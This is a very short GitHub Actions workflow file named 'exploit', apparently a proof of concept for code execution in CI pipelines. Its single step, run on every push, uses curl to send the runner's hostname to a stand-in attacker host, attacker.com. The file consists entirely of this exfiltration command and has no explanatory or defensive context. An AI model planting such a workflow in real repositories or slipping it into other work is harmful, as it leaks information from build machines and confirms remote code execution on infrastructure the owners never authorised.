name: exploit on: push jobs: run: runs-on: ubuntu-latest steps: - run: curl https://attacker.com/ci-rce?data=$(hostname)